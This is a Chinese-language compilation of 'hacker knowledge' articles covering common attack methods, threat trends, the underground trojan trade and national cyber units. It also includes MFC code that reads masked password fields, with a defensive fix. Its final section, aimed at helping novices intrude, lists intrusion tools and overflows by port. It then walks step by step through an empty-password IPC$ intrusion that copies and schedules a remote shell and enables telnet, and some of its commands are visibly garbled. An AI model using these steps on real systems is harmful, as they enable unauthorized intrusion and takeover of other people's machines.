黑客知识1
1全面分析黑客常用九种攻击方法

许多上网的用户对网络安全可能抱着无所谓的态度，认为最多不过是被“黑客”盗用账号，他们往往会认为“安全”只是针对那些大中型企事业单位的，而且黑客与自己无怨无仇，干嘛要攻击自己呢？其实，在一无法纪二无制度的虚拟网络世界中，现实生活中所有的阴险和卑鄙都表现得一览无余，在这样的信息时代里，几乎每个人都面临着安全威胁，都有必要对网络安全有所了解，并能够处理一些安全方面的问题，那些平时不注意安全的人，往往在受到安全方面的攻击时，付出惨重的代价时才会后悔不已。同志们要记住啊！防人之心不可无呀！

为了把损失降低到最低限度，我们一定要有安全观念，并掌握一定的安全防范措施，禁绝让黑客无任何机会可趁。下面我们就来研究一下那些黑客是如何找到你计算机中的安全漏洞的，只有了解了他们的攻击手段，我们才能采取准确的对策对付这些黑客。

1、获取口令

这又有三种方法：一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的shadow文件。此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。

2、放置特洛伊木马程序

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时，这个程序就会通知黑客，来报告您的ip地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

3、www的欺骗技术

在网上用户可以利用ie等浏览器进行各种各样的web站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的url改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

4、电子邮件攻击

电子邮件攻击主要表现为两种方式：一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的ip地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

5、通过一个节点来攻击其他节点

黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过ip欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如ip欺骗，因此较少被黑客使用。

6、网络监听

网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如netxrayforwindows95/98/nt，sniffitforlinux、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

7、寻找系统漏洞

许多系统都有这样那样的安全漏洞（bugs），其中某些是操作系统或应用软件本身具有的，如sendmail漏洞，win98中的共享目录密码验证漏洞和ie5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

8、利用帐号进行攻击

有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多unix主机都有ftp和guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用unix操作系统提供的命令如finger和ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。

9、偷取特权

利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。

2黑客入侵攻击四种最新趋势

从1988年开始，位于美国卡内基梅隆大学的CERTCC(计算机紧急响应小组协调中心)就开始调查入侵者的活动。CERTCC给出一些关于最新入侵者攻击方式的趋势。

趋势一：攻击过程的自动化与攻击工具的快速更新

攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。

1.扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前，新的扫描工具利用更先进的扫描技术，变得更加有威力，并且提高了速度。

2.入侵具有漏洞的系统。以前，对具有漏洞的系统的攻击是发生在大范围的扫描之后的。现在，攻击工具已经将对漏洞的入侵设计成为扫描活动的一部分，这样大大加快了入侵的速度。

3.攻击扩散。2000年之前，攻击工具需要一个人来发起其余的攻击过程。现在，攻击工具能够自动发起新的攻击过程。例如红色代码和Nimda病毒这些工具就在18个小时之内传遍了全球。

4.攻击工具的协同管理。自从1999年起，随着分布式攻击工具的产生，攻击者能够对大量分布在Internet之上的攻击工具发起攻击。现在，攻击者能够更加有效地发起一个分布式拒绝服务攻击。协同功能利用了大量大众化的协议如IRC(InternetRelayChat)、IR(InstantMessage)等的功能。

趋势二：攻击工具的不断复杂化

攻击工具的编写者采用了比以前更加先进的技术。攻击工具的特征码越来越难以通过分析来发现，并且越来越难以通过基于特征码的检测系统发现，例如防病毒软件和入侵检测系统。当今攻击工具的三个重要特点是反检测功能，动态行为特点以及攻击工具的模块化。

1.反检测。攻击者采用了能够隐藏攻击工具的技术。这使得安全专家想要通过各种分析方法来判断新的攻击的过程变得更加困难和耗时。

2.动态行为。以前的攻击工具按照预定的单一步骤发起进攻。现在的自动攻击工具能够按照不同的方法更改它们的特征，如随机选择、预定的决策路径或者通过入侵者直接的控制。

3.攻击工具的模块化。和以前攻击工具仅仅实现一种攻击相比，新的攻击工具能够通过升级或者对部分模块的替换完成快速更改。而且，攻击工具能够在越来越多的平台上运行。例如，许多攻击工具采用了标准的协议如IRC和HTTP进行数据和命令的传输，这样，想要从正常的网络流量中分析出攻击特征就更加困难了。

趋势三：漏洞发现得更快

每一年报告给CERT/CC的漏洞数量都成倍增长。CERT/CC公布的漏洞数据2000年为1090个，2001年为2437个，2002年已经增加至4129个，就是说每天都有十几个新的漏洞被发现。可以想象，对于管理员来说想要跟上补丁的步伐是很困难的。而且，入侵者往往能够在软件厂商修补这些漏洞之前首先发现这些漏洞。随着发现漏洞的工具的自动化趋势，留给用户打补丁的时间越来越短。尤其是缓冲区溢出类型的漏洞，其危害性非常大而又无处不在，是计算机安全的最大的威胁。在CERT和其它国际性网络安全机构的调查中，这种类型的漏洞是对服务器造成后果最严重的。

趋势四：渗透防火墙

我们常常依赖防火墙提供一个安全的主要边界保护。但是情况是：

*已经存在一些绕过典型防火墙配置的技术，如IPP(theInternetPrintingProtocol)和WebDAV(Web-basedDistributedAuthoringandVersioning)

*一些标榜是“防火墙适用”的协议实际上设计为能够绕过典型防火墙的配置。

特定特征的“移动代码”(如ActiveX控件，Java和JavaScript)使得保护存在漏洞的系统以及发现恶意的软件更加困难。

另外，随着Internet网络上计算机的不断增长，所有计算机之间存在很强的依存性。一旦某些计算机遭到了入侵，它就有可能成为入侵者的栖息地和跳板，作为进一步攻击的工具。对于网络基础架构如DNS系统、路由器的攻击也越来越成为严重的安全威胁。

采用主动防御措施应对新一代网络攻击

“红色代码”蠕虫病毒在因特网上传播的最初九小时内就感染了超过250，000个计算机系统。该感染导致的代价以每天2亿美元飞速增长，最终损失高达26亿美元。“红色代码”，“红色代码II”，及“尼姆达”、“求职信”快速传播的威胁显示出现有的网络防御的严重的局限性。市场上大多数的入侵检测系统是简单的，对网络中新出现的、未知的、通常称做“瞬时攻击：Zero-dayAttack”的威胁没有足够防御手段。

黑客的“机会之窗”

目前大多数的入侵检测系统是有局限性的，因为它们使用特征码去进行辨别是否存在攻击行为。这些系统采用这种方式对特定的攻击模式进行监视。它们基于贮存在其数据库里的识别信息：类似于防病毒软件检查已知病毒的方式。这意味着这些系统只能检测他们已经编入识别程序的特定的攻击。因为“瞬时攻击”是新出现的，尚未被广泛认识，所以在新的特征码被开发出来，并且进行安装和配置等这些过程之前，它们就能绕过这些安全系统。实际上，仅仅需要对已知的攻击方式进行稍微的修改，这些系统就不会认识这些攻击方式了，从而给入侵者提供了避开基于特征码的防御系统的手段。

从新的攻击的发动到开发新的特征码的这段时间，是一个危险的“机会之窗”，许多的网络会被攻破。这时候许多快速的入侵工具会被设计开发出来，网络很容易受到攻击。下图举例说明了为什么大多数的安全产品在该时期内实际上是无效的。CERT组织研制的这个图表说明了一个网络攻击的典型的生命周期。该曲线的波峰就在攻击的首次袭击之后，这是大多数安全产品最终开始提供保护的时候。然而“瞬时攻击”是那些最老练的黑客在最早期阶段重点展开的。

同时，现在那些快速进行的攻击利用了广泛使用的计算机软件中的安全漏洞来造成分布更广的破坏。仅仅使用几行代码，他们就能编写一个蠕虫渗透到计算机网络中，通过共享账号克隆自己，然后开始攻击你的同伴和用户的网络。使用这种方式，在厂商开发出特征码并将其分发到用户的这段时间内，“尼姆达蠕虫”仅仅在美国就传播到了超过100，000的网络站点。这些分发机制使“瞬间攻击”像SirCam和LoveBug两种病毒分别席卷了230万和4000万的计算机，而不需要多少人为干预。其中有些攻击甚至还通过安装一个后门来为以后的破坏建立基础，该后门允许对手、黑客和其他未获授权的用户访问一个组织重要的数据和网络资源。

3黑客游戏潜规则

“QQ木马求挂(无后门绝对免杀)，按信封收费180元/W，进1W结算一次或每日0点至凌晨1点结算。结算方式：即时支付宝或工行转帐。联系QQ：XXXXX(请注明带挂QQ木马马)……收肉鸡了，收流量了，出售QQ号……”

看到这些信息你的表情也许可以用惊愕来形容，但对于另一些人来说，对这些信息已经习以为常了，因为这些信息经常会在一些技术群，网络安全站点上的论坛中出现。随着信息化社会的发展，各种各样的需求也在层出不穷的涌现。一些有技术的“黑客”们都在考虑如何让手中的那些代码转变成money，在他们眼中，也许能证明自己存在的价值早已蜕变成“这段代码到底能换多少张人民币”了，过去我们经常说“一切向前看”，如今都变成了一切向“钱”看了。

潜规则一：马披龙袍装麒麟，不变的是本质从灰鸽子说黑客技术演进

2003年初，互联网诞生了一个名为灰鸽子的工作室，开发出一套名为“远程控制系统”的软件，当时经过笔者的一些分析后，觉得还是把它定义为木马比较恰当。在后来，特别是今年，也验证了笔者当时的定论。“灰鸽子远程控制管理系统”只是木马的一个“马甲”而已。提到木马就不得不说一下著名的“冰河”(作者：黄鑫)，它是早期的木马软件之一，操作简单方便，基于c/s(客户端/服务器端)模式开发。说到操作简单，你只需要在入侵后的主机上安装一个server.exe，在操作的主机安装client.exe就可以了。正是因为它容易上手，所以被更多的“黑客”们利用。如今的灰鸽子也是基于这样的技术架构开发出来的，但是它确实也有很多的改进，有自己独特的东西在里面，现在的灰鸽子可以被简单定位为反弹型后门木马。

作者开发这个软件目的也许是想更加方便的管理远程主机，服务器等，又或许是想靠”远程控制软件“这个华丽的外表，赚取了更多的money。但无论出于什么样的目的，这款软件随着编写技术的提升，和产品的不断改进，逐渐出现了能逃避杀毒软件的版本。笔者曾经拿到这样的版本，在经过技术分析之后，得出以下结论：新版本的改进主要体现在加壳技术上，在原灰鸽子的基础上加层保护壳，使杀毒软件库中的病毒特征码无法与之匹配，从而达到躲避杀毒软件围剿的目的。目前，它的最新版本仍然可以轻松躲过瑞星、卡巴斯基、nod32等知名杀毒软件。

此规则点评：一场没有结局的猫鼠游戏，安全厂家不断的招募民间黑客提升自身产品实力，从而促使地下黑客技术不断完善，用于躲避追杀。说实话，谁都不容易。

潜规则二：我出力，你付钱这是理所当然利益驱使黑客变质

杀毒软件的原理主要是靠特征码比对技术，根据用户提交或者其他渠道捕获到的病毒样本制定出相应的病毒库，而病毒库中并没有真正的病毒源代码，只是病毒特征码。灰鸽子经过不屑的努力，终于飞进了千家万户，在非常多的主机和服务器上“落户”，给国家和个人的计算机系统造成了严重影响，一些“黑客”通过灰鸽子将个人用的生活照，夫妻照片等个人隐私泄露到网络中，而把政府机关和企业的一些机密信息拿来和businessspy(商业间谍)做现金交易。总的来说这些都是利益驱使，更多的“黑客”会认为这是他的劳动所得，是靠双手和脑力劳动换取过来的，符合一分耕耘，一份收获的逻辑推理。

此规则点评：千古不变的至理名言——有钱能使鬼推磨。付出当然就要有实实在在的收获，谁说我做的不对，那准是在嫉妒，我是黑客我怕谁。

潜规则三：一山不容二虎两个和尚没水喝

2004年圈子出了更火暴的事情，因为入侵某官方站点的游戏数据库而获的不菲的利润，后因在分钱问题上，意见不和，用经济术语来讲就是不能达到利益共同点，最后两人在京城大打出手，双方都有一些损失由此演出了一场真人pk。后来两个主角还觉得不够过瘾，最后直接在著名的圈中论坛安全焦点上进行了长达100多页以上的对骂。更多圈子里面的人发表的看法是狗咬狗一嘴毛!入侵数据库虽说是赚钱，但是这钱来是见不得光的。当然，你是辛苦了，努力了，但是这是通过非法手段入侵得到的，从法律上说这就是违法的事，说起这两个人也是圈子中的名人，由于身在圈中的关系，两位主角的名字就不方便透漏了。

此规则点评：黑客讲究协同作战，默契的配合永远都很重要，但在利益面前，团结的力量很容易疲软。这也是当今社会的普遍存在的潜规则。

潜规则四：黑客眼里没有拿不下的山头

越来越多的“黑客”都在靠“技术”吃饭，有些黑客拿下网络游戏数据库，通过提权后弄到整个服务器的控制权，刷装备，换金币来完成一些游戏装备交易；还有一些人甚至拿下境外的高利贷，赌博站点，在获得个人信息后，联系犯罪组织，狂刷受害人的信用卡，疯狂的购物；还有人利用技术制造出虚假银行站点，通过phishing(网络钓鱼)手段获取那些使用网上银行用户的真实信息，使用keybordloger(键盘记录器)或木马来捕获对方录入信息，从而拿到受害人个人信息，银行帐号的卡号及密码记录。

此规则点评：只要被黑客盯上，如果没有强大的反黑力量支持，那你可以直接准备后事了。就算是有反黑的实力，毕竟明枪易躲，暗箭难防。

综上所述：各行各业都有道，有规则，黑客界里也一样，有人说黑客更多的给人的感觉是网络上收费的保安，保镖，安全公司呢就是镖局。互联网就是个虚拟的江湖，但是黑客是真实存在的，他们在里面充当着黑与白的角色，有的是充当杀手(破坏者cracker)，有的是充当保镖(hacker)，这就是黑客圈中的潜规则。江湖中，黑色交易每天都在幕后进行着，潜规则也将继续存在……。

未来的网络安全是不容忽视的，笔者在这里提醒广大的计算机用户：在熟练使用电脑的同时，要先学会保护自己，提高自身的网络安全知识和认识，这样至少可以避免一些不幸的发生。最后奉劝那些只想着赚钱的黑客兄弟们一句话：常在江湖混，早晚要还的，还是多做一些善事吧!

4未来网络安全十大趋势

Counterpane网络安全公司的技术长官BruceSchneier列举了影响当今信息安全的十种趋势。

趋势一信息将比以往更有价值

例如，Amazon.com公司通过信息运用在线购买图书系统，大幅提高了工作效率。同样，互联网零售商Pets.com破产时，Schneier介绍，公司的客户数据库成了“他们拥有的资产唯一价值”。

信息在控制接入方面同样具有价值，例如，签署契约，用户鉴定，同时对于法律执行中的追踪罪犯，搜集证据等方面也很有价值。

趋势二网络成为关键的基础设施

网络成为关键的基础设施，但这并不是设计的初衷，“它就是这样发生了”，Schneier说。

互联网的发展趋势尚未能够阻挡重要系统步入网络。互联网使公司大幅提高了工作效率，使人们之间的交流与沟通变得更加便捷畅快，但同时也给经济方面带来风险。Schneier坦言：“如果互联网全部或部分瘫痪，势必给经济带来不良影响。”

趋势三用户不必管理个人信息

比如，互联网服务供给商记录用户在网站的浏览历史，收发的信息；同样，电话接线员的服务器上也会保留一份用户的号码簿。Schneier称：“你的私人信息都很有价值，但却不能保证信息的安全性，即便是对于高度私人化的信息也是如此。”

趋势四黑客逐渐变成犯罪的职业

黑客袭击不再是一种个人兴趣，而是越来越多地变为一种有组织的、利益驱使的职业犯罪。Schneier认为：“由于对手正在改变，黑客袭击的性质也随之而变。”

拒绝服务相关的敲诈勒索与“网络钓鱼”就是黑客袭击的两个例子。此外，黑客还会利用黑市穿透共同的IT系统。

趋势五复杂性成为最大敌人

Schneier认为“系统越复杂，面临的安全危险就越大”，并称互联网为“有史以来最复杂的机器”。网络安全技术的发展始终未能跟上互联网前进的步伐。“网络安全形势好转，可同时系统却变得更加复杂。”

趋势六黑客袭击要比漏洞补丁来得更快

新的漏洞出现要比设备制造商修补的速度更快。在其他方面，一些嵌入式系统中出现的漏洞，比如思科系统公司的路由器，不能被修补，导致许多公司成为被攻击的对象。

趋势七蠕虫较以往更为高级

它们已经包含漏洞测评工具，正在扫描全体漏洞的防御系统，并正把Google公司作为信息搜集工具。“这种趋势导致越来越多的蠕虫犯罪。”

趋势八对端成为最弱连接点

Schneier认为：“如果远程计算机不可信赖，不管你的认证方案有多棒都无济于事。”在很多情况下，不在公司保护范围内的电脑是最弱的连接。这些电脑经常感染蠕虫和间谍软件，为黑客袭击提供机会。

趋势九安全软件可能威胁终端

各大公司不断地发展软件来防御终端用户，如DRM（数字版权保护）软件。Schneier指出，“我们看到越来越多的安全防护非但不能够保护用户，反而被用作侵袭用户的工具。”在至少一种情况下，包括索尼公司安装的DRM软件，如果没有用户的许可，软件都会对终端用户造成伤害。“围绕这一问题的有关标准和规则将成为一个大战场。”Schneier说，并预言这是一场关于保护用户和侵袭用户的软件之间的争斗。

趋势十法规将推动安全检查

详细描述公司该如何处理数据的法规并不少见。类似《萨班-奥西利法案》（Sarbanes-OxleyAct）的法规将成为公司安全检查背后的驱动力。

5黑客探取密码原理与防范措施

Edit控件是Windows的一个标准控件，当把其Password属性设为True时，就会将输入的内容屏蔽为星号，从而达到保护的目的。虽然我们看来都是星号，但程序中的Edit控件实际仍是用户输入的密码，应用程序可以获取该控件中的密码，其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这个特性，当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时，则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息，这样Edit框中的内容就一目了然了。

二、黑客软件工作方法：

首先要取得当前的窗口，并判断是否是Edit控件，一般多通过鼠标来指定要探测的窗口，例如在WM_MOUSEMOVE消息的响应函数中进行判断，现列举代码片段如下：

//将客户坐标转换成屏幕坐标

ClientToScreen(&point)；

//返回一个包含指定屏幕坐标点的窗口

CWnd*pWnd=CWnd::WindowFromPoint(point)；

if(pWnd)

{

//获取窗口句柄

HWNDhwndCurr=pWnd->GetSafeHwnd()；

if((::GetWindowThreadProcessId(GetSafeHwnd()，NULL))!=(::GetWindowThreadProcessId(hwndCurr，NULL)))

{

charlpClassName[255]；

//获取类名

if(::GetClassName(hwndCurr，lpClassName，255))

{

//判断是否是Edit控件

if(0==m_strWndClass.CompareNoCase(‘EDIT‘))

{

//获取窗口风格

LONGlStyle=::GetWindowLong(hwndCurr，GWL_STYLE)；

//如果设置了ES_PASSWORD属性

if(lStyle&ES_PASSWORD)

{

charszText[255]；

//通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息

::SendMessage(hwndCurr，WM_GETTEXT，255，(LPARAM)szText)；//密码已保存在szText中

m_strPassword=szText；

}

}

}

}

上述代码中值得注意的有以下几个关键地方：

ClientToScreen(&point)；

CWnd*pWnd=CWnd::WindowFromPoint(point)；

HWNDhwndCurr=pWnd->GetSafeHwnd()；

这三句代码可以获取当前鼠标位置所在窗口的窗口句柄，在SendMessage中要用到的。

::SendMessage(hwndCurr，WM_GETTEXT，255，(LPARAM)szText)；

这便是真正起作用的SendMessage了，其第一个参数指定了要接收消息的窗口句柄，我们已经通过上面的代码获取到了，第二个参数就是让Edit控件返回字符的WM_GETTEXT消息了，并将得到的内容保存在szText中。

三、防范措施

既然我们搞清除了黑客软件普遍采取的手法，那我们自然能制订出一套防范其攻击的措施来。下面我们就要对Password进行保护。

从以上分析我们可以看出：Edit控件的漏洞主要在于没有对发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查，只要能找到Edit窗口句柄，任何进程都可获取其内容。所以必须要对发送消息者的身份进行验证，这里给出一种方法来验证发送消息者的身份是否合法：

1.创建新CEdit类

从CEdit继承一个子类CPasswordEdit，申明全局变量g_bSenderIdentity表明消息发送者的身份:

BOOLg_bSenderIdentity；oufxpwx|O

然后响应CWnd的虚函数DefWindowProc，在这个回调函数中进行身份验证:

LRESULTCPasswordEdit::DefWindowProc(UINTmessage，WPARAMwParam，LPARAMlParam)

{

//对Edit的内容获取必须通过以下两个消息之一

if((message==WM_GETTEXT)||(message==EM_GETLINE))

{

//检查是否为合法

if(!g_bSenderIdentity)

{

//非法获取，显示信息

AfxMessageBox(_T(‘报告：正在试图窃取密码！‘))；

return0；

}

//合法获取

g_bSenderIdentity=FALSE；

}

returnCEdit::DefWindowProc(message，wParam，lParam)；

}

2.在数据输入对话框中做些处理

在对话框中申明一个类成员m_edtPassword:

CpasswordEditm_edtPassword；

然后在对话框的OnInitDialog()中加入下列代码:

m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD，this)；

将控制与新类做关联。

之后要在对话框的数据交换函数中将身份设为合法:

voidCDlgInput::DoDataExchange(CDataExchange＊pDX)

{

//如果获取数据

//注意：对于CPropertyPage类这里不需要if(pDX－>m_bSaveAndValidate)条件

if(pDX－>m_bSaveAndValidate)

{

g_bSenderIdentity=TRUE；

}

CDialog::DoDataExchange(pDX)；

//{{AFX_DATA_MAP(CDlgInput)

DDX_Text(pDX，IDC_EDIT_PASSWORD，m_sPassword)；

//}}AFX_DATA_MAP

}

这样，Password输入框就拥有了合法身份，会受到保护。

结论：

以上的方法仅针对VC程序，对于其他语言如VB、Delphi等语言，需要借助VC做一个Password的ActiveX控件，实现方法与上述方法基本类似。以上程序均用VisualC＋＋6.0编制调试通过。

6各国黑客部队大扫描

近一段时间，西方大报小报都在恶炒所谓中国黑客事件，但是对自己的黑客部队却都闭口不谈。实际上，对于高度依赖信息化、网络化装备的西方国家而言，大都建有十分专业的“黑客部队”。不仅如此，一些被认为极度落后的国家也拥有自己的“网军”，这些黑客技术先进，手段多样，让人防不胜防。

西方都有黑客部队

要说“黑客部队”规模最大，建立最早的首推美国。2005年，美军就已组建专门负责网络作战的“网络战联合功能构成司令部”，而且美陆海空军和战略司令部都有“网军”，网络部队作为一种全新的部队样式，已被正式纳入美军的作战序列。美国在欧洲的“小兄弟”英国也是积极效仿。据报道，英国军情六处早在2001年就秘密组建了一支有数百名计算机精英组成的黑客部队。该部队的选材标准可谓是不拘一格，甚至一些有过前科的民间黑客也被收编。除了欧美大国外，信息技术十分先进的日本也非常重视黑客部队的建设。日本防卫省目前已经组建了一支由军中计算机专家组成的约5000人的网络战部队，专门从事网络系统的攻防。该部队的主要任务是，进行反黑客、反病毒入侵的攻击，同时研制开发可破坏其他国家网络系统的跨国性“网络武器”，必要时可对敌方重要网络实施“瘫痪战”。

除了发达国家积极建设网络部队外，一些发展中国家也是趋之若鹜，试图在新一轮较量中获取“非对称”优势。目前印军组建了联合计算机应急分队，并将一些民间“黑客”和编程高手“招安”。此外，印军也在位于新德里的陆军总部建立了网络安全部门，他们还将在所有军区和重要军事部门的总部建立网络安全分部。除此之外，俄罗斯、以色列等国也都十分重视“黑客部队”，不过对更多的国家而言，身兼黑客重任的则是一些所谓负责网络安全的专职人员，因为他们深谙“黑客”技巧，懂得网络安全的命门在哪里。

技术先进手段多样

黑客往往利用网络的漏洞实施攻击，其惯用的攻击手段主要包括“后门程序”、“炸弹攻击”、“僵尸网络”等等。当一个训练有素的程序员设计一个功能较复杂的软件时，都习惯于先将整个软件分割为若干模块，然后再对各模块单独设计、调试，而后门则是一个模块的秘密入口。在软件研制完成后，部分后门仍然没有被“关掉”，那么，后门就可能被黑客用特殊软件和工具搜索发现并利用。通过后门，黑客可以在对方毫无察觉的情况下侵入计算机，窃取有价值的情报。而“炸弹攻击”的基本原理是利用特殊工具软件，在短时间内向目标机集中发送大量超出系统接收范围的信息或者垃圾信息，目的在于使对方目标机出现超负荷、网络堵塞等状况，从而造成目标的系统崩溃及拒绝服务。而“僵尸网络”是指黑客通过特洛伊木马等病毒集中控制一群计算机，用来对其他网络、服务器或者计算机发起大规模的网络攻击，同时黑客控制的这些计算机所保存的信息也都可被黑客随意“取用”。

此外，一些黑客还经常使用“广泛撒网”的战术，对付那些从物理上同互联网隔开的军用网络和计算机。他们将一些木马病毒散布到特定的网络中，如果敌军方的移动存储设备不幸中毒，那么一旦该存储设备被接入军内计算机或网络，木马病毒就开始疯狂复制、下载秘密信息，并将其隐藏在移动存储设备中。一旦此移动存储器被再次接到链接互联网的计算机上，那么这些机密信息就会通过互联网自动转发到黑客部队的手中。据称，前段时间发生的日本“宙斯盾”资料泄密事件中，存储“宙斯盾”机密信息的硬盘链接到互联网后，就是首先被日本网络监察人员发现了蛛丝马迹。

防御黑客软硬兼施

为了防止黑客攻击给己方网络和计算机带来损失，各国军方从硬件和软件两方面双管齐下抵御黑客攻击。硬件防火墙是必不可少的。防火墙是设置在不同网络之间的一系列部件的组合。通过监测、限制、更改跨越防火墙的信息，尽可能地对外部屏蔽网络内部的信息，有选择地接受外部访问，在被保护网络和外部网络之间架起一道屏障，以防止发生不可预测的破坏性入侵。

除了硬件防火墙以外，一些防御、监控软件也是必不可少的，这些软件除了可以抵御部分攻击外，还能监控网络的异常。当然，最好的防御就是进攻，大多数国家的“黑客部队”身兼双重任务，瘫痪对方的攻击网络，堵死对方的攻击路径才是最好的选择。不过，任何军队都不能打包票自己的网络不会被入侵，所以绝大多数国家部队都规定高等级机密信息不得存储在上网计算机上

7各个网络端口的入侵方法

希望对新手入侵有帮助!

1.1433端口入侵

scanport.exe查有1433的机器

SQLScanPass.exe进行字典暴破(字典是关键)

最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello溢出漏洞入侵。

nc-vv-l-p本机端口sqlhelloF.exe入侵ip1433本机ip本机端口

(以上反向的，测试成功)

sqlhelloz.exe入侵ip1433(这个是正向连接)

2.4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3.3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4.80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5.serv-u入侵(21端口)

对5.004及以下系统，可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统，可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码，可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长)，通过与字典档(dict.txt)的比较，得到密码

6.554端口

用real554.exe入侵。

7.6129端口

用DameWare6129.exe入侵。

8.系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。

9.3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。(可用mydoomscan.exe查)。

10.其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

1.C:>netuse$‘>\\127.0.0.1IPC$‘‘/user:‘admintitrators‘

这是用‘流光‘扫到的用户名是administrators，密码为‘空‘的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为‘空‘，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2.C:>copysrv.exe$‘>\\127.0.0.1admin$

先复制srv.exe上去，在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了)。

3.C:>nettimefile://127.0.0.1/

查查时间，发现127.0.0.1的当前时间是2002/3/19上午11:00，命令成功完成。

4.C:>atfile://127.0.0.1/11:05srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快，不然你怎么启动啊.

5.C:>nettimefile://127.0.0.1/

再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05，那就准备开始下面的命令。

6.C:>telnet127.0.0.199

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:>copyntlm.exe$‘>\\127.0.0.1admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8.C:WINNTsystem32>ntlm

输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行)。当出现‘DONE‘的时候，就说明已经启动正常。然后使用‘netstarttelnet‘来开启Telnet服务!

